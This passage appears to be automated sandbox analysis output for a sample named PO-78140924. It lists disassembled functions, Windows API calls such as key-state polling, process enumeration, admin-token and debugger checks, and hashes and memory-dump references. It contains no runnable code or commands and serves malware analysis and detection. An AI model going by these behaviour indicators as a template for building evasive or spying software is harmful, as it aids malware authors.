                                                • API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
                                                • String ID:
                                                • API String ID: 830902736-3916222277
                                                • Opcode ID: 89c988a2e7b02dfb8538136c8bc94972068998b8e8942b573c06e115e3d01a2f
                                                • Instruction ID: 533924c1e5dfa5972e1256dad3819fbec64e07d95cc52cde864025c821e0b2c4
                                                • Opcode Fuzzy Hash: 89c988a2e7b02dfb8538136c8bc94972068998b8e8942b573c06e115e3d01a2f
                                                • Instruction Fuzzy Hash: 68B17975640625EFDF14CFA8C9C57BDBBF1BF04711F08806AEC48AA295E734A950EB60
                                                Function 0009BFF6 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 149nativewindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                  • Part of subcall function 00012344: GetCursorPos.USER32(?), ref: 00012357
                                                  • Part of subcall function 00012344: ScreenToClient.USER32(000D57B0,?), ref: 00012374
                                                  • Part of subcall function 00012344: GetAsyncKeyState.USER32(00000001), ref: 00012399
                                                  • Part of subcall function 00012344: GetAsyncKeyState.USER32(00000002), ref: 000123A7
                                                • ReleaseCapture.USER32 ref: 0009C06A
                                                • SetWindowTextW.USER32(?,00000000), ref: 0009C114
                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0009C127
                                                • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?), ref: 0009C209
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID$pb$pb
                                                • API String ID: 973565025-24452153
                                                • Opcode ID: 976d7e5a3d73a6c8cfb2241ce07104e0c404711d5bfd2c1e1896b4fac1659ef8
                                                • Instruction ID: 3abc58750b40db6cb626e58bb9c41b1d083709213b12ec0a2764f4901bc4a2e0
                                                • Opcode Fuzzy Hash: 976d7e5a3d73a6c8cfb2241ce07104e0c404711d5bfd2c1e1896b4fac1659ef8
                                                • Instruction Fuzzy Hash: 9451CD70208301AFEB04EF14CC95FAA7BE1FB88311F00452EF9559B2E2CB35A944DB62
                                                Function 0004997C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71memoryfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,0009FB24,00000001,00000000,?,?,000483C9,0009FB24,0000000C,00000080), ref: 0004998B
                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00049992
                                                  • Part of subcall function 00038CA8: __getptd_noexit.LIBCMT ref: 00038CA8
                                                • __lseeki64_nolock.LIBCMT ref: 00049A56
                                                • SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0009FB24,00000001,00000000,?,?,000483C9), ref: 00049A71
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0009FB24,00000001,00000000,?,?,000483C9,0009FB24), ref: 00049AA1
                                                • __lseeki64_nolock.LIBCMT ref: 00049ABE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Heap__lseeki64_nolock$AllocateErrorFileLastProcess__getptd_noexit
                                                • String ID: shj
                                                • API String ID: 3769897626-2847237874
                                                • Opcode ID: 5527d0536f1e9fbdc404a6bd79ef2953e415d646b1dfd949e43a68d1c21e5134
                                                • Instruction ID: dd9fce12c24de81e7c00740db2c695e279dd60c55e3139c40d990f76dcac4582
                                                • Opcode Fuzzy Hash: 5527d0536f1e9fbdc404a6bd79ef2953e415d646b1dfd949e43a68d1c21e5134
                                                • Instruction Fuzzy Hash: 5F1197B2A406019BDB112BB8DC0A7FE36A4FF45320F104378F528D21E1EB3C88104766
                                                Function 000258C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 7f8db62949eda1edc81664e282fca92907cb3a89e865ac5818370a79340609d9
                                                • Instruction ID: 28f8d494357fe4b55ded3e06a2f594862c6d9dba59b2c8f22a6b35bc8e2541e5
                                                • Opcode Fuzzy Hash: 7f8db62949eda1edc81664e282fca92907cb3a89e865ac5818370a79340609d9
                                                • Instruction Fuzzy Hash: 1212BC70A00619EFDF14CFA4D985AEEB3FAFF48300F108569E406A7252EB35AE51CB54
                                                Function 00025680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00030F36: std::exception::exception.LIBCMT ref: 00030F6C
                                                  • Part of subcall function 00030F36: __CxxThrowException@8.LIBCMT ref: 00030F81
                                                • _memmove.LIBCMT ref: 000605AE
                                                • _memmove.LIBCMT ref: 000606C3
                                                • _memmove.LIBCMT ref: 0006076A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                • String ID:
                                                • API String ID: 1300846289-0
                                                • Opcode ID: 3d51c26fe226f373779e72ff5b934103ccd11399673f371aa427e26b4b7b64fb
                                                • Instruction ID: c3e0aa98c22c81e3d107b91aae04b69733cc0892c019ab93c401b518328000fe
                                                • Opcode Fuzzy Hash: 3d51c26fe226f373779e72ff5b934103ccd11399673f371aa427e26b4b7b64fb
                                                • Instruction Fuzzy Hash: ED02B270E00219DFDF14DF64D991AAE7BF5EF44300F1480A9E80AEB256EB31DA51CB95
                                                Function 0001FEA9 Relevance: 8.0, APIs: 3, Strings: 1, Instructions: 1000COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: pb
                                                • API String ID: 0-2194326746
                                                • Opcode ID: 09f36c930b94712d70be7e3d4370996cf265cb668d34b3eab79935aac3d1cae7
                                                • Instruction ID: b7510e8a66d6b88d0acc219f84fa22e154f366aced696f204e6d2cc589be335a
                                                • Opcode Fuzzy Hash: 09f36c930b94712d70be7e3d4370996cf265cb668d34b3eab79935aac3d1cae7
                                                • Instruction Fuzzy Hash: 2D926A70A083518FD760DF14D490BABBBE5BF84304F14896DE88A8B352D775EC89CB92
                                                Function 0001192B Relevance: 7.8, APIs: 5, Instructions: 308nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtdllDialogWndProc_W.NTDLL(?,?), ref: 000119FA
                                                  • Part of subcall function 00011290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 000112D8
                                                • GetSysColor.USER32(0000000F), ref: 00011A4E
                                                • SetBkColor.GDI32(?,00000000), ref: 00011A61
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ColorDialogNtdllProc_
                                                • String ID:
                                                • API String ID: 2596215360-0
                                                • Opcode ID: b128ede724ded75a98d7675508b93c984aa460099cd19c8b886e9302d3c23288
                                                • Instruction ID: 59242f2560e06d2e20ae39d63581e24469c356f271aed2d9ad0199b221a02157
                                                • Opcode Fuzzy Hash: b128ede724ded75a98d7675508b93c984aa460099cd19c8b886e9302d3c23288
                                                • Instruction Fuzzy Hash: C77124B111A884B9FA7C66284C49DFF2C8DDF4A382B95012AF302D1087CF15DD81A2FB
                                                Function 00012344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 00012357
                                                • ScreenToClient.USER32(000D57B0,?), ref: 00012374
                                                • GetAsyncKeyState.USER32(00000001), ref: 00012399
                                                • GetAsyncKeyState.USER32(00000002), ref: 000123A7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: AsyncState$ClientCursorScreen
                                                • String ID:
                                                • API String ID: 4210589936-0
                                                • Opcode ID: bb6cc5a127e4d9a1bfb7846be37a76ccf2bb104d6d7b348f88faffdc6e316522
                                                • Instruction ID: 9565fffbbaa371b8593d18a7a452c4ddae1e9ea508cf493d33fbadfdf59d7538
                                                • Opcode Fuzzy Hash: bb6cc5a127e4d9a1bfb7846be37a76ccf2bb104d6d7b348f88faffdc6e316522
                                                • Instruction Fuzzy Hash: 8C418175904109FBDF559F64C844EEDBBB4FB05360F10432AF834922A1C7356AA0DBA0
                                                Function 00023190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __itow
                                                • String ID:
                                                • API String ID: 3482036329-0
                                                • Opcode ID: f83e6c536b4461e6baefe7c2d31476bd3ec22e4af3e5d421c957e743c564593c
                                                • Instruction ID: b7de3e9d81200614feb79def9542655ef00a19cb291a08c69b7074245bed4603
                                                • Opcode Fuzzy Hash: f83e6c536b4461e6baefe7c2d31476bd3ec22e4af3e5d421c957e743c564593c
                                                • Instruction Fuzzy Hash: 2822AD716083119FC724DF24D891BAFB7E5AF84314F10492DF89A97292DB35EE48CB92
                                                Function 00073C99 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00073CBE
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00073CCC
                                                • Process32NextW.KERNEL32(00000000,?), ref: 00073CEC
                                                • CloseHandle.KERNEL32(00000000), ref: 00073D96
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 420147892-0
                                                • Opcode ID: 3536bd42316b62764b9157e2516ae636617699431fb88069f45dd5f4b37f64b5
                                                • Instruction ID: 16c6fa4fbd843589fc4e3579b9b4d06c0513e4a9ebe5b02b18c57393eedc395b
                                                • Opcode Fuzzy Hash: 3536bd42316b62764b9157e2516ae636617699431fb88069f45dd5f4b37f64b5
                                                • Instruction Fuzzy Hash: E831A0715083019FE310EF20D885AEFBBF8FF95344F54492DF485861A2EB749A89CB92
                                                Function 0009C502 Relevance: 6.1, APIs: 4, Instructions: 83nativewindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                • GetCursorPos.USER32(?), ref: 0009C53C
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,?,?,?,?,0004BB2B), ref: 0009C551
                                                • GetCursorPos.USER32(?), ref: 0009C59E
                                                • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0004BB2B), ref: 0009C5D8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                • String ID:
                                                • API String ID: 1423138444-0
                                                • Opcode ID: 50f38066fe56b27de5d77cfbfd14eb7658cd1320cdb88fe3479d4e7e0130d6ea
                                                • Instruction ID: f30083377f252e434086d01aa2dd57c6e9dcab8b5dd8308ea1441b2791bfa11e
                                                • Opcode Fuzzy Hash: 50f38066fe56b27de5d77cfbfd14eb7658cd1320cdb88fe3479d4e7e0130d6ea
                                                • Instruction Fuzzy Hash: 5631E335A00918AFEF118F54C848EEA7BF5FB49311F414066F9458B261C735AD90EBA0
                                                Function 00011290 Relevance: 6.1, APIs: 4, Instructions: 59nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                • NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 000112D8
                                                • GetClientRect.USER32(?,?), ref: 0004B77B
                                                • GetCursorPos.USER32(?), ref: 0004B785
                                                • ScreenToClient.USER32(?,?), ref: 0004B790
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                                • String ID:
                                                • API String ID: 1010295502-0
                                                • Opcode ID: a9503dbe4d7e6c6d234e24a4e888295c5f35767f944b53634f1ee8872d014c5e
                                                • Instruction ID: fa64cd5e8fb7501d496a8addbb701db49a5f03b30de37dbdef5d888e31b3a1c2
                                                • Opcode Fuzzy Hash: a9503dbe4d7e6c6d234e24a4e888295c5f35767f944b53634f1ee8872d014c5e
                                                • Instruction Fuzzy Hash: BD118C3560051AEFDF14EFA4D8859FE77B8FB06301F100456FA01E3241C734BAA18BA5
                                                Function 0004B441 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0004B494: _memset.LIBCMT ref: 0004B4A1
                                                  • Part of subcall function 00030AC0: InitializeCriticalSectionAndSpinCount.KERNEL32(000D4158,00000000,000D4144,0004B470,?,?,?,0001100A), ref: 00030AC5
                                                • IsDebuggerPresent.KERNEL32(?,?,?,0001100A), ref: 0004B474
                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0001100A), ref: 0004B483
                                                Strings
                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0004B47E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                • API String ID: 3158253471-631824599
                                                • Opcode ID: 2fabd05d6c65b794baa3a7d69d6f303ee7828c46ed47320de132d59d3204cd35
                                                • Instruction ID: 110c741f11595e158b1f492fd1981073ce90583b66ffc96b357fa481a47b9adb
                                                • Opcode Fuzzy Hash: 2fabd05d6c65b794baa3a7d69d6f303ee7828c46ed47320de132d59d3204cd35
                                                • Instruction Fuzzy Hash: 76E06DB42007018BE321DF39E8047967BE4AB04345F01893DE892C6252E7B8D444CBA1
                                                Function 00074A08 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00074A31
                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00074A48
                                                • FreeSid.ADVAPI32(?), ref: 00074A58
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                • String ID:
                                                • API String ID: 3429775523-0
                                                • Opcode ID: 544e4afaaea0802896c40654eda74b2803f640cd1979e647f595e7a6b1a827b5
                                                • Instruction ID: 8f1009d5ee98c421b64ab52da9232d7114e0995f113dd8c9d2bcc5a22f9d1fac
                                                • Opcode Fuzzy Hash: 544e4afaaea0802896c40654eda74b2803f640cd1979e647f595e7a6b1a827b5
                                                • Instruction Fuzzy Hash: 30F03775A51209BFEB00DFE09C89ABEBBBCFB08201F1044A9A901E2181E6746A148B50
                                                Function 0001E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4804783161d7e7e7aab504a4f8fe91b78e5075bfdc4e4bafcb874f8bfa4f9be7
                                                • Instruction ID: 66021439df1f7ba7abe214b1809e2be62077a3774caf790e727b7931e7d026de
                                                • Opcode Fuzzy Hash: 4804783161d7e7e7aab504a4f8fe91b78e5075bfdc4e4bafcb874f8bfa4f9be7
                                                • Instruction Fuzzy Hash: EC229A74A002569FDB24DF58C494AEEF7F1FF08310F148169EC56AB382E374AA85CB91
                                                Function 000116DE Relevance: 3.1, APIs: 2, Instructions: 83nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                  • Part of subcall function 000125DB: GetWindowLongW.USER32(?,000000EB), ref: 000125EC
                                                • GetParent.USER32(?), ref: 0004B93A
                                                • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?), ref: 0004B9B4
